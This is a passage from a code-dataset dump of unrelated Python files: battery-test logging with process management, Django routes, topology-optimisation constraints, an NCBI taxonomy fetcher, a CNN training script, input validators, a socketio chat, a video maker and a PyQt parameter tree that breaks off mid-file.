successfully, delete me later\")\n TempData = TemperatureClass() \n \n TempString = ser.readline().decode(\"utf-8\")[:-2] # remove new line characters at end '/r/n'\n \n if TempString == \"Starting\": # Check it has started properly\n TempString = ser.readline().decode(\"utf-8\")[:-2] # remove new line characters at end '/r/n'\n \n TempData.AddData(TempString)\n else:\n print(\"ERROR, incorrect starting serial value\")\n \n # First Charge\n CBA_FirstCharge(CBAExecutableFileLocation,CurrentDirectory,1.675)\n self.SetCBAPID()\n TempData.InitialTime = time.time() # Reset the time\n \n while self.DoesCBAExist() == True and TempData.Thermo_Ave[-1] < self.MaxT:\n TempString = ser.readline().decode(\"utf-8\")[:-2] # remove new line characters at end '/r/n'\n TempData.AddData(TempString)\n \n print(\"Finished first charge...\")\n \n \n CBA_ConstantDischargeRate(CBAExecutableFileLocation,CurrentDirectory)\n self.SetCBAPID()\n TempData.InitialTime = time.time() # Reset the time\n \n FileName = str( time.strftime(\"%b_%d_%Y-%H_%M_%S\", time.localtime()) )\n FileName = FileName + \"_OCV_Current_0125_A.csv\"\n FileObj = open(CurrentDirectory+os.sep+FileName,'w')\n print(\"Successfully created a new file with the path \"+CurrentDirectory+os.sep+FileName)\n \n print(\"TIMESTAMP,STATE,AVERAGE TEMPERATURE,AVERAGE COLD JUNCTION,CJ1,Temp1,CJ2,Temp2\\n\",file=FileObj)\n FileObj.flush()\n\n while self.DoesCBAExist() == True and TempData.Thermo_Ave[-1] < self.MaxT:\n TempString = ser.readline().decode(\"utf-8\")[:-2] # remove new line characters at end '/r/n'\n TempData.AddData(TempString)\n TempData.WriteLine(FileObj)\n \n # Allow a cool down of 5 hours\n FileObj.close()\n \n TempData.status = \"Cool Down\"\n t_end = time.time() + 60*60*5 # Allow MAX 5 hours cool down\n t_end_min_wait = time.time() + 60*60*2 # Allow 2 hours for chemical equilibrium to be reached in the battery\n # Keep waiting for the \n while time.time() < t_end and ( (TempData.Thermo_Ave[-1] - TempData.CJ_Ave[-1]) > 2 or time.time() < t_end_min_wait ): \n TempString = ser.readline().decode(\"utf-8\")[:-2] # remove new line characters at end '/r/n'\n TempData.AddData(TempString)\n \n except: \n print(\"Some error\")\n ser.close() # close serial\n ser.close() # close serial\n print(\"finished...\")\n # Checks to see if there is a CBA program running. Returns true if there is one or more instances running\n \n def DoesCBAExist(self):\n ReturnVariable = False # Assume worst case scenario\n command = \"tasklist\"\n TempValue = subprocess.run(command, stdout=subprocess.PIPE,shell=True)\n StringValue = TempValue.stdout.decode(\"utf-8\")\n if \"WMRCBA.exe\" in StringValue: # It has found it\n if self.CBAPID in StringValue:\n ReturnVariable = True\n if StringValue.count(\"WMRCBA.exe\") > 1:\n print(\"ERROR: multiple instances of CBA programs\")\n \n return ReturnVariable\n \n # Set the CBA PID, if there are two instances go for the last one and start an error\n def SetCBAPID(self):\n CBAIndex = -1\n command = \"tasklist\"\n TempValue = subprocess.run(command, stdout=subprocess.PIPE,shell=True)\n StringValue = TempValue.stdout.decode(\"utf-8\")\n for Line in StringValue.splitlines():\n if \"WMRCBA.exe\" in Line: # It has found it\n CBAIndex += 1 # increment by one \n LineParts = Line.split(\" \")\n while \"\" in LineParts:\n LineParts.remove(\"\")\n PID = LineParts[1] \n\n if CBAIndex == 0:\n self.CBAPID = PID\n else:\n print(\"ERROR: There are two instances of the CBA program\")\n subprocess.run(\"Taskkill /PID \"+PID)\n print(\"Killed program with PID = \"+PID)\n\n def KillExcessCBA(self): \n command = \"tasklist\"\n TempValue = subprocess.run(command, stdout=subprocess.PIPE,shell=True)\n StringValue = TempValue.stdout.decode(\"utf-8\")\n for Line in StringValue.splitlines():\n if \"WMRCBA.exe\" in Line: # It has found it \n LineParts = Line.split(\" \")\n while \"\" in LineParts:\n LineParts.remove(\"\")\n PID = LineParts[1] \n\n if PID != self.CBAPID:\n print(\"ERROR: There are two instances of the CBA program\")\n subprocess.run(\"Taskkill /PID \"+PID+\" /F\")\n print(\"Killed program with PID = \"+PID)\n \n","sub_path":"Code/TestComputer/_Combined_Resistance_Code_V2/OCVEstimateClass.py","file_name":"OCVEstimateClass.py","file_ext":"py","file_size_in_byte":9205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"106495835","text":"from django.conf.urls import url\r\nfrom . import views\r\n\r\n\r\napp_name = \"todolists\"\r\n\r\nurlpatterns = [\r\n url(r'^$', views.homepage, name='homepage'),\r\n url(r'^add_todo_list$', views.add_todo_list, name='add_todo_list'),\r\n url(r'^add_todo$', views.add_todo, name='add_todo'),\r\n url(r'^delete_todo/(?P\\d+)', views.delete_todo, name='delete_todo'),\r\n url(r'^edit_todo/(?P\\d+)', views.edit_todo, name='edit_todo'),\r\n]\r\n","sub_path":"todolists/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"622181504","text":"\"\"\"\nConstraints class used to specify the density constraints of the topology\noptimisation problem. It contains functions for minimum and maximum element\ndensity in the upcomming iteration and the magnitude of the volume constraint\nfunction itself of the current design. This version of the code is used for the\ncompliant design, local displacement maximisation.\n\nBram Lagerweij\nAerospace Structures and Materials Department TU Delft\n2018\n\"\"\"\n\nimport numpy as np\n\n\nclass DensityConstraint(object):\n \"\"\"\n This object relates to the constraints used in this optimization.\n It can be used for the MMA updatescheme to derive what the limit is for all\n element densities at every itteration.\n The class itself is not changed by the itterations.\n\n Attributes\n -------\n nelx : int\n Number of elements in x direction.\n nely : int\n Number of elements in y direction.\n move : float\n Maximum change in density of an element over 1 itteration.\n volume_frac : float\n Maximum volume that can be filled with material.\n volume_derivative : 2D array size(1, nelx*nely)\n Sensityvity of the density constraint to the density in each element.\n density_min : float (optional)\n Minumum density, set at 0.0 if not specified.\n density_max : float (optional)\n Maximum density, set at 0.0 if not specified.\n\n Methods\n -------\n xmin(load, x)\n Returns the minimum density value of all ellements of this itteration.\n xmax(load, x)\n Returns the maximum density value of all ellements of this itteration.\n current_volconstrain(x)\n Returns the current magnitude of the volume constraint funcion.\n \"\"\"\n def __init__(self, nelx, nely, move, volume_frac, density_min=0.0, density_max=1.0):\n self.nelx = nelx\n self.nely = nely\n self.move = move\n self.volume_frac = volume_frac\n self.volume_derivative = 1/(nelx*nely*volume_frac)*np.ones((1, nely*nelx))\n self.density_min = density_min\n self.density_max = density_max\n\n def xmin(self, x):\n \"\"\"\n This function calculates the minimum density value of all ellements of\n this itteration.\n\n Parameters\n _______\n x : 2D array size(nely, nelx)\n Density distribution of this itteration.\n\n Returns\n _______\n xmin : 2D array size(nely, nelx)\n Minimum density values of this itteration for the update scheme.\n \"\"\"\n xmin = self.density_min*np.ones((self.nely, self.nelx))\n xmin = np.maximum(xmin, x - self.move)\n return xmin\n\n def xmax(self, x):\n \"\"\"\n This function calculates the maximum density value of all ellements of\n this itteration.\n\n Parameters\n _______\n x : 2D array size(nely, nelx)\n Density distribution of this itteration.\n\n Returns\n _______\n xmax : 2D array size(nely, nelx)\n Maximum density values of this itteration after updating.\n \"\"\"\n xmax = self.density_max*np.ones((self.nely, self.nelx))\n xmax = np.minimum(xmax, x + self.move)\n return xmax\n\n def current_volconstrain(self, x):\n \"\"\"\n Calculates the current magnitude of the volume constraint funcion: ::\n\n ∑ x\n cur_vol = ────────────────── - 1\n nelx*nelx*vol_frac\n Parameters\n _______\n x : 2D array size(nely, nelx)\n Density distribution of this itteration.\n\n Returns\n _______\n curvol : float\n Curent value of the density constraint function.\n \"\"\"\n cur_vol = np.sum(x)/(self.nelx*self.nely*self.volume_frac) - 1\n return cur_vol\n","sub_path":"src_Actuator/constraints.py","file_name":"constraints.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"298520472","text":"#! /usr/bin/env python\n# encoding: utf-8\n\n'''\nGrace Cagle\nAssignment 18 Task 1\n\nA program reading a file of species names, retriving taxonomic information\nfrom NCBI and writing it to a CSV file\n'''\n\nimport argparse\n# import glob\n# import os\nfrom Bio import Entrez\nimport time\nimport csv\n\nnames = ['superclass', 'class', 'subclass', 'infraclass', 'superorder',\n'order', 'superfamily', 'family', 'genus']\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-i', \"--infile\",\n required=True,\n help=\"A file containing species names\"\n )\n parser.add_argument(\n '-o', \"--outfile\",\n required=True,\n help=\"The output file name\"\n )\n return parser.parse_args()\n\n\ndef read_file(args):\n with open(args.infile, 'r') as f:\n sp = f.read().strip('\\n').split('\\n')\n # print(sp)\n return sp\n\n\ndef get_ID(sp):\n Entrez.email = 'gcagle1@lsu.edu'\n tax_id_list = []\n for s in sp:\n esearch_query = Entrez.esearch(db='taxonomy', term=s, retmode='xml')\n esearch_result = Entrez.read(esearch_query)\n tax_id = esearch_result['IdList']\n tax_id_list.append(tax_id)\n time.sleep(1)\n return tax_id_list\n\n\ndef get_tax(tax_id_list):\n taxonomy = []\n for each_id in tax_id_list:\n search = Entrez.efetch(id=each_id, db=\"taxonomy\", retmode='xml')\n data = Entrez.read(search)\n taxonomy.append(data)\n return taxonomy\n\n\ndef make_dict(tax_id_list, taxonomy):\n data = []\n for x in range(len(tax_id_list)):\n data.append({d['Rank']: d['ScientificName'] for d in taxonomy[x][0]['LineageEx'] if d['Rank'] in names})\n return data\n\n\ndef write_csv(args, data):\n with open(args.outfile, 'w') as csvfile:\n writer = csv.DictWriter(csvfile, restval='', fieldnames=names)\n writer.writeheader()\n for d in data:\n writer.writerow(d)\n\n\ndef main():\n args = get_args()\n sp = read_file(args)\n tax_id_list = get_ID(sp)\n taxonomy = get_tax(tax_id_list)\n data = make_dict(tax_id_list, taxonomy)\n write_csv(args, data)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"answers/gcagle1/18_task1.py","file_name":"18_task1.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"468874475","text":"import tensorflow as tf\nimport matplotlib.image as mpimg\nimport numpy as np\nimport os\nimport csv\nimport sys\nsys.path.insert(0, '..\\\\..\\\\..\\\\memomingTools')\nfrom memomingTools import csv_batch_container\n\nbatch_size = 32\ntraining_epochs = 100\nimg_size = 48\nnum_classes = 2\n\nX = tf.placeholder( tf.float32, shape=[None,img_size,img_size,1], name=\"input_0\")\nY = tf.placeholder( tf.float32, shape=[None,2])\nis_training = tf.placeholder( tf.bool, name=\"is_training_0\" )\n\n# Convolutional Layer #1\nconv1_layers = tf.layers.conv2d ( inputs=X, filters=32, kernel_size=[3,3], padding=\"SAME\", activation=tf.nn.relu, use_bias=True )\npool1_layers = tf.layers.max_pooling2d( inputs=conv1_layers, pool_size=[2,2], padding=\"SAME\", strides=2 )\ndropout1_layers = tf.layers.dropout( inputs=pool1_layers, rate=0.5, training=is_training )\n\n# # Convolutional Layer #2\nconv2_layers = tf.layers.conv2d ( inputs=dropout1_layers, filters=64, kernel_size=[3,3], padding=\"SAME\", activation=tf.nn.relu, use_bias=True )\npool2_layers = tf.layers.max_pooling2d( inputs=conv2_layers, pool_size=[2,2], padding=\"SAME\", strides=2 )\ndropout2_layers = tf.layers.dropout( inputs=pool2_layers, rate=0.5, training=is_training )\n\n# # Convolutional Layer #3\nconv3_layers = tf.layers.conv2d ( inputs=dropout2_layers, filters=128, kernel_size=[3,3], padding=\"SAME\", activation=tf.nn.relu, use_bias=True )\npool3_layers = tf.layers.max_pooling2d( inputs=conv3_layers, pool_size=[2,2], padding=\"SAME\", strides=2 )\ndropout3_layers = tf.layers.dropout( inputs=pool3_layers, rate=0.5, training=is_training )\n\nflat = tf.contrib.layers.flatten( dropout3_layers )\ndense4 = tf.layers.dense(inputs=flat, units=625, activation=tf.nn.relu ) #625 이부분을 뭘로해야할지 모르겟다.\ndropout4 = tf.layers.dropout( inputs=dense4, rate=0.5, training=is_training )\n\nlogits = tf.layers.dense(inputs=dropout4, units=2, activation=None, use_bias=True, name=\"logits_0\" )\ncost = tf.reduce_mean( tf.nn.softmax_cross_entropy_with_logits_v2(labels=Y, logits=logits) )\noptimizer = tf.train.AdamOptimizer(0.0005).minimize(cost)\nsaver = tf.train.Saver()\n\ndef training_model ( sess, x_data, y_data ):\n return sess.run( [ cost, optimizer], feed_dict={ X: x_data, Y:y_data, is_training:True} )\n\nwith tf.Session() as sess :\n sess.run(tf.global_variables_initializer())\n\n for epoch in range(training_epochs):\n avg_cost = 0\n path = \"..\\\\..\\\\data\\\\individual_model\\\\\"\n train = csv_batch_container( path + \"train_data.csv\" )\n total_batch = round((train.num_examples() / batch_size) + 0.5 ) # 반올림 처리\n\n for i in range(total_batch):\n batch_xl, batch_yl = train.next_batch(batch_size)\n batch_xs = list()\n batch_ys = list()\n\n for j in range(len(batch_xl)) :\n t_img = mpimg.imread( path + \"dummy_data_big\\\\\" + batch_xl[j] )\n t_imp = np.resize(t_img, (img_size,img_size,1) )\n batch_xs.append(t_imp)\n t_ls = [0,0]\n t_ls[ int(batch_yl[j]) ] = 1\n batch_ys.append( t_ls )\n\n # Train\n c, _ = training_model ( sess, batch_xs, batch_ys )\n avg_cost += c / total_batch\n\n print('Epoch: ', '%04d' %(epoch + 1), 'Cost = ', avg_cost)\n print('Training Finished....! \\n\\n')\n\n\n save_path = saver.save( sess, \"saved_model\" + os.sep + 'woojae_model.ckpt' )\n print(\"Model saved to %s\" % save_path)\n\n\n # Testing\n batch_size = 64\n correct = 0\n csv_container = csv_batch_container(path + \"test_data.csv\")\n total_batch = round((csv_container.num_examples() / batch_size) + 0.5 ) # 반올림 처리\n\n batch_xl, batch_yl = csv_container.next_batch(batch_size)\n batch_xs = list()\n batch_ys = list()\n\n for j in range(len(batch_xl)) :\n t_img = mpimg.imread( path + \"dummy_data_big\\\\\"+ batch_xl[j] )\n t_imp = np.resize(t_img, (img_size,img_size,1) )\n batch_xs.append(t_imp)\n t_ls = [0,0]\n t_ls[ int(batch_yl[j]) ] = 1\n batch_ys.append( t_ls )\n\n prediction_list = sess.run(logits, feed_dict={X:batch_xs, is_training:False})\n\n for i in range(len(prediction_list)) :\n print(\"Predict :\",np.argmax(prediction_list[i]),\"Label :\",np.argmax(batch_ys[i]))\n if (np.argmax(prediction_list[i]) == np.argmax(batch_ys[i])) :\n correct += 1\n\n print(\"Accuracy :\",correct/batch_size*100,\"%\")\n","sub_path":"python/individual_model/make_individual_model.py","file_name":"make_individual_model.py","file_ext":"py","file_size_in_byte":4559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"339704344","text":"\"\"\"\nModule for validating user input\n\"\"\"\nimport json\n\nfrom PyInquirer import ValidationError\nfrom PyInquirer import Validator\n\n\nclass NumberValidator(Validator):\n \"\"\"Validate strings are numbers\"\"\"\n\n def validate(self, document):\n \"\"\"Specifically validate the string is a number between 0 and 66535\"\"\"\n try:\n int(document.text)\n except ValueError as value_error: # pragma: no cover\n raise ValidationError(\n message='Please enter a number',\n cursor_position=len(document.text)) from value_error # pragma: no cover\n if int(document.text) < 0 or int(document.text) > 65535:\n raise ValidationError(\n message='Please enter a number between 0 and 65535',\n cursor_position=len(document.text)) # pragma: no cover\n\n\nclass MCCValidator(Validator):\n \"\"\"Validate string is a MCC code\"\"\"\n\n def validate(self, document):\n \"\"\"Specifically validate the string is a number between 000 and 999\"\"\"\n try:\n int(document.text.lstrip('0'))\n except ValueError as value_error: # pragma: no cover\n raise ValidationError(\n message='Please enter a number',\n cursor_position=len(document.text)) from value_error # pragma: no cover\n if int(document.text.lstrip('0')) < 0 or int(document.text.lstrip('0')) > 999 or len(document.text) != 3:\n raise ValidationError(\n message='Please enter a number between 000 and 999',\n cursor_position=len(document.text)) # pragma: no cover\n\n\nclass MNCValidator(Validator):\n \"\"\"Validate string is a MNC code\"\"\"\n\n def validate(self, document):\n \"\"\"Specifically validate the string is a number between 00 and 99\"\"\"\n try:\n int(document.text.lstrip('0'))\n except ValueError as value_error: # pragma: no cover\n raise ValidationError(\n message='Please enter a number',\n cursor_position=len(document.text)) from value_error # pragma: no cover\n if int(document.text.lstrip('0')) < 0 or int(document.text.lstrip('0')) > 99 or len(document.text) != 2:\n raise ValidationError(\n message='Please enter a number between 00 and 99',\n cursor_position=len(document.text)) # pragma: no cover\n\n\nclass IMSIValidator(Validator):\n \"\"\"Validate string is a list of IMSIs\"\"\"\n\n def validate(self, document):\n \"\"\"Specifically validate the string is a JSON parsable list of records\"\"\"\n imsi = None\n try:\n imsi = json.loads(document.text)\n except Exception as err: # pragma: no cover\n raise ValidationError(\n message='Not valid JSON',\n cursor_position=len(document.text)) from err # pragma: no cover\n if not isinstance(imsi, list):\n raise ValidationError(\n message='Must be a list of IMSI records',\n cursor_position=len(document.text)) # pragma: no cover\n","sub_path":"blue/5G/daedalus/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"234962109","text":"'''\nCreated on 2 Jan 2017\n\n@author: chrisdoherty\n'''\n\n# Occupied state configuration\noccupied_config = {\n # Time to wait for no detections thereby assuming the room is now unoccupied\n # Seconds\n \"timeout\": 30\n }\n\n# Unoccupied state configuration\nunoccupied_config = {\n # The time between consecutive detections in seconds that contribute to the \n # 'threshold' argument. We look for <= the interval between detections.\n \"max_detection_interval\": 30, \n \n # The number of consecutive detections with the specified interval required \n # before we assume the room is occupied\n \"required_consecutive_detections\": 1\n }\n\n# Represenst the hub room configuration\nhub_room_config = {\n # The pin the motion sensor is attached to.\n \"sensing_pin\": 4\n }","sub_path":"src/app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"381942112","text":"nome = input('Digite Seu Nome: ')\nnmi = nome.lower()\nnma = nome.upper()\nnlet= nome.strip().split()\nnomee = nome.replace(' ','')\nletras = len(nomee)\nletum = len(nlet [0])\nprint('Seu nome em minúsculo: {}'.format(nmi))\nprint('Seu nome em Maiúsculo: {}'.format(nma))\nprint('Número de letras sem contar os espaços: {}'.format(letras))\nprint('Número de Letras do seu primeiro nome: {}'.format(letum))\n","sub_path":"Python Exercises/ex022.py","file_name":"ex022.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"200839273","text":"import logging\n\nfrom socketio.namespace import BaseNamespace\nfrom socketio.mixins import RoomsMixin, BroadcastMixin\nfrom socketio.sdjango import namespace\n\n@namespace('/chat')\nclass ChatNamespace(BaseNamespace, RoomsMixin, BroadcastMixin):\n nicknames = []\n\n def initialize(self):\n self.logger = logging.getLogger(\"socketio.chat\")\n self.log(\"Socketio session started\")\n \n \n def log(self, message):\n self.logger.info(\"[{0}] {1}\".format(self.socket.sessid, message))\n \n def on_join(self, room):\n self.join(room)\n return True\n \n def on_nickname(self, nickname):\n self.log('Nickname: {0}'.format(nickname))\n self.session['nickname'] = nickname\n nicknames = self.session.get('nicknames', None)#WTH is 'nicknames'?!! \n if nicknames is None:\n nicknames = set()\n nicknames.add(nickname)\n self.session['nicknames'] = nicknames\n \n self.broadcast_event('announcement', '%s has connected' % nickname)\n self.broadcast_event('nicknames', list(nicknames))\n return True, nickname\n\n def recv_disconnect(self):\n # Remove nickname from the list.\n self.log('Disconnected')\n nickname = self.session.get('nickname')\n if nickname:\n nicknames = self.session.get('nicknames', None)\n if nicknames:\n nicknames.remove(nickname)\n self.session['nicknames'] = nicknames\n self.broadcast_event('announcement', '%s has disconnected' % nickname)\n self.broadcast_event('nicknames', list(self.nicknames))\n self.disconnect(silent=True)\n return True\n\n def on_user_message(self, room, msg):\n self.log('User message: {0}'.format(msg))\n self.emit_to_room(room, 'msg_to_room', self.session['nickname'], msg)\n return True\n","sub_path":"examples/django_chat/chat/sockets.py","file_name":"sockets.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"600836719","text":"import os, glob\n\ndef make_video(outvid, images=None, fps=30, size=None,\n is_color=True, format=\"FMP4\"):\n \"\"\"\n Create a video from a list of images.\n \n @param outvid output video\n @param images list of images to use in the video\n @param fps frame per second\n @param size size of each frame\n @param is_color color\n @param format see http://www.fourcc.org/codecs.php\n @return see http://opencv-python-tutroals.readthedocs.org/en/latest/py_tutorials/py_gui/py_video_display/py_video_display.html\n \"\"\"\n from cv2 import VideoWriter, VideoWriter_fourcc, imread, resize\n fourcc = VideoWriter_fourcc(*format)\n vid = None\n for image in images:\n if not os.path.exists(image):\n raise FileNotFoundError(image)\n img = imread(image)\n if vid is None:\n if size is None:\n size = img.shape[1], img.shape[0]\n vid = VideoWriter(outvid, fourcc, float(fps), size, is_color)\n if size[0] != img.shape[1] and size[1] != img.shape[0]:\n img = resize(img, size)\n vid.write(img)\n vid.release()\n return vid\n\nVIDEO_SAVE_DIR = '/content/videos'\nVIDEO_DIR = '/content/drive'\nimages = list(glob.iglob(os.path.join(VIDEO_SAVE_DIR, '*.*')))\n# Sort the images by name index.\nimages = sorted(images, key=lambda x: float(os.path.split(x)[1][:-3]))\nprint(images)\noutvid = os.path.join(VIDEO_DIR, \"output.mp4\")\nmake_video(outvid, images, fps=25)\nprint(\"Done...!\")\n","sub_path":"frames2vid.py","file_name":"frames2vid.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"45556778","text":"\nfrom __future__ import division\nfrom PyQt4.QtGui import QMainWindow\nfrom PyQt4.QtGui import QApplication\nfrom PyQt4.QtGui import QTreeView\nfrom PyQt4.QtGui import QHBoxLayout\nfrom PyQt4.QtGui import QVBoxLayout\nfrom PyQt4.QtGui import QPushButton\nfrom PyQt4.QtGui import QWidget\nfrom PyQt4.QtGui import QStandardItemModel\nfrom PyQt4.QtGui import QSortFilterProxyModel\nfrom PyQt4.QtGui import QStandardItem\nfrom PyQt4.QtGui import QAbstractItemView\nfrom PyQt4.QtGui import QHeaderView\nfrom PyQt4.QtGui import QStyledItemDelegate\nfrom PyQt4.QtGui import QSpinBox\nfrom PyQt4.QtGui import QDoubleSpinBox\nfrom PyQt4.QtGui import QLineEdit\nfrom PyQt4.QtGui import QComboBox\nfrom PyQt4.QtCore import Qt\nfrom PyQt4.QtCore import QSize\nfrom PyQt4.QtCore import QString\nfrom PyQt4.QtCore import QRegExp\nfrom PyQt4.QtCore import QModelIndex\n\n\nclass StringEditor(QLineEdit):\n\n def __init__(self, parent=None):\n super(StringEditor, self).__init__(parent)\n\n def setEditorData(self, index):\n value = index.model().data(index, Qt.EditRole).toString()\n self.setText(value)\n\n def setModelData(self, model, index):\n value = self.text()\n model.setData(index, value, Qt.EditRole)\n\n\nclass IntEditor(QSpinBox):\n\n def __init__(self, parent=None, value_min=None, value_max=None):\n super(IntEditor, self).__init__(parent)\n if value_min is not None:\n self.setMinimum(value_min)\n else:\n self.setMinimum(-1e9)\n if value_max is not None:\n self.setMaximum(value_max)\n else:\n self.setMaximum(1e9)\n\n def setEditorData(self, index):\n value = index.model().data(index, Qt.EditRole).toInt()\n self.setValue(value[0])\n\n def setModelData(self, model, index):\n self.interpretText()\n value = self.value()\n model.setData(index, value, Qt.EditRole)\n\n\nclass FloatEditor(QDoubleSpinBox):\n\n def __init__(self, parent=None, value_min=None, value_max=None):\n super(FloatEditor, self).__init__(parent)\n if value_min is not None:\n self.setMinimum(value_min)\n else:\n self.setMinimum(-1e9)\n if value_max is not None:\n self.setMaximum(value_max)\n else:\n self.setMaximum(1e9)\n self.setDecimals(2)\n\n def setEditorData(self, index):\n value = index.model().data(index, Qt.EditRole).toFloat()\n self.setValue(value[0])\n\n def setModelData(self, model, index):\n self.interpretText()\n value = self.value()\n model.setData(index, value, Qt.EditRole)\n\n\nclass ChoiceEditor(QComboBox):\n\n def __init__(self, parent=None, choices=None):\n super(ChoiceEditor, self).__init__(parent)\n if choices is not None:\n for choice in choices:\n self.addItem(choice)\n\n def setEditorData(self, index):\n value = index.model().data(index, Qt.EditRole).toString()\n self.setCurrentIndex(self.findText(value))\n\n def setModelData(self, model, index):\n value = self.currentText()\n model.setData(index, value, Qt.EditRole)\n\n\nclass BoolEditor(QComboBox):\n\n def __init__(self, parent=None):\n super(BoolEditor, self).__init__(parent)\n self.addItem(\"False\")\n self.addItem(\"True\")\n\n def setEditorData(self, index):\n value = index.model().data(index, Qt.EditRole).toString()\n self.setCurrentIndex(self.findText(value))\n\n def setModelData(self, model, index):\n value = self.currentText()\n model.setData(index, value, Qt.EditRole)\n\n\nclass ParameterItemDelegate(QStyledItemDelegate):\n\n def __init__(self, parent=None):\n\n super(ParameterItemDelegate, self).__init__(parent)\n\n def createEditor(self, parent, option, index):\n parameter = index.model().data(index, Qt.UserRole+1).toPyObject()\n dtype = parameter.type\n ptype = dtype.phil_type\n if ptype == 'str':\n editor = StringEditor(parent)\n elif ptype == 'float':\n editor = FloatEditor(parent, dtype.value_min, dtype.value_max)\n elif ptype == 'int':\n editor = IntEditor(parent, dtype.value_min, dtype.value_max)\n elif ptype == 'choice':\n def strip(w):\n w = str(w)\n if w.startswith(\"*\"):\n return w[1:]\n return w\n choices = [strip(w) for w in parameter.words]\n editor = ChoiceEditor(parent, choices)\n elif ptype == 'bool':\n editor = BoolEditor(parent)\n else:\n raise RuntimeError(\"Handle type %s\" % dtype)\n return editor\n\n def setEditorData(self, editor, index):\n editor.setEditorData(index)\n\n def setModelData(self, editor, model, index):\n editor.setModelData(model, index)\n\n def updateEditorGeometry(self, editor, option, index):\n editor.setGeometry(option.rect)\n\n def sizeHint(self, option, index):\n size = super(ParameterItemDelegate, self).sizeHint(option, index)\n size.setWidth(size.width() * 1.5)\n size.setHeight(size.height() * 2)\n return size\n\n\nclass ParameterItemModel(QStandardItemModel):\n\n def __init__(self, parameters=None):\n super(ParameterItemModel, self).__init__()\n self.setParameters(parameters)\n\n def setParameters(self, parameters):\n\n # Save the parameters\n self.parameters = parameters\n\n # Clear the model\n self.clear()\n\n # Traverse the parameter tree and add to the tree view widget\n def add_parameters(root, parameter):\n if parameter.is_scope:\n name_node = QStandardItem(parameter.name)\n name_node.setFlags(Qt.NoItemFlags | Qt.ItemIsEnabled)\n name_node.setData(parameter, Qt.UserRole + 1)\n for obj in parameter.objects:\n add_parameters(name_node, obj)\n root.appendRow(name_node)\n elif parameter.is_definition:\n name_node = QStandardItem(parameter.name)\n name_node.setFlags(Qt.NoItemFlags | Qt.ItemIsEnabled)\n name_node.setData(parameter, Qt.UserRole + 1)\n value_node = QStandardItem(str(parameter.extract()))\n value_node.setData(parameter, Qt.UserRole + 1)\n root.appendRow([name_node, value_node])\n else:\n raise RuntimeError('Handle This!')\n\n # Populate the tree\n if parameters is not None:\n for obj in parameters.objects:\n add_parameters(self, obj)\n\n def getParameters(self):\n return self.parameters\n\n def data(self, index, role=Qt.DisplayRole):\n if role == Qt.ToolTipRole:\n parameter = index.model().data(index, Qt.UserRole+1).toPyObject()\n if parameter is None:\n return \"\"\n return str(parameter.help)\n return super(ParameterItemModel, self).data(index, role)\n\n\nclass ParameterSortFilterProxyModel(QSortFilterProxyModel):\n\n def __init__(self, parent=None):\n\n super(ParameterSortFilterProxyModel, self).__init__(parent)\n self.setFilterKeyColumn(0)\n\n self.expert_level = 0\n self.search_string = ''\n self.string_filter_cache = {}\n\n def setExpertLevel(self, level):\n self.expert_level = level\n self.invalidateFilter()\n\n def setSearchString(self, text):\n self.search_string = text\n self.invalidateFilter()\n\n def invalidateFilter(self):\n\n # Empty the string filter cache\n self.string_filter_cache = {}\n\n # Get the model\n model = self.sourceModel()\n\n # Recursive function to traverse the tree of nodes.\n # If a child matches the search string, keep the parent\n def update_string_filter_cache(model, parent):\n show_parent = False\n for row in range(model.rowCount(parent)):\n index = model.index(row, 0, parent)\n parameter = model.data(index, Qt.UserRole+1).toPyObject()\n name = parameter.full_path()\n if model.hasChildren(index):\n show = update_string_filter_cache(model, index)\n else:\n show = str(self.search_string) in name\n self.string_filter_cache[name] = show\n show_parent = show_parent or show\n return show_parent\n\n # Update the string filter cache\n update_string_filter_cache(model, QModelIndex())\n\n # Call the parent method\n super(ParameterSortFilterProxyModel, self).invalidateFilter()\n\n def filterAcceptsRow(self, row, parent):\n\n # Get the index\n index = self.sourceModel().index(row, 0, parent)\n\n # Get the parameter\n parameter = index.model().data(index, Qt.UserRole+1).toPyObject()\n\n # Get the expert level\n expert = parameter.expert_level\n if expert is None:\n expert = 0\n\n # Check the expert level\n if self.expert_level == 0 and expert > 0:\n return False\n\n # Check the string filter cache\n if self.string_filter_cache[parameter.full_path()] == False:\n return False\n\n # Otherwise OK\n return True\n\n\nclass ParameterTreeView(QTreeView):\n\n def __init__(self, parent=None):\n\n super(ParameterTreeView, self).__init__(parent)\n self.setItemDelegate(ParameterItemDelegate())\n self.setAlternatingRowColors(True)\n self.setSortingEnabled(False)\n self.setHeaderHidden(True)\n self.setAnimated(True)\n self.setSelectionBehavior(QAbstractItemView.SelectItems)\n self.setEditTriggers(QAbstractItemView.AllEditTriggers)\n self.setIndentation(30)\n\n\nclass ParameterTreeWidget(QWidget):\n\n def __init__(self, parent=None, parameters=None):\n\n # Init the parent\n super(ParameterTreeWidget, self).__init__(parent)\n\n # Create the model\n model = ParameterItemModel(parameters)\n\n # Create a parameter tree\n self.tree = ParameterTreeView()\n\n # Create the filter model\n filter_model = ParameterSortFilterProxyModel()\n filter_model.setSourceModel(model)\n filter_model.setExpertLevel(0)\n\n # Set the 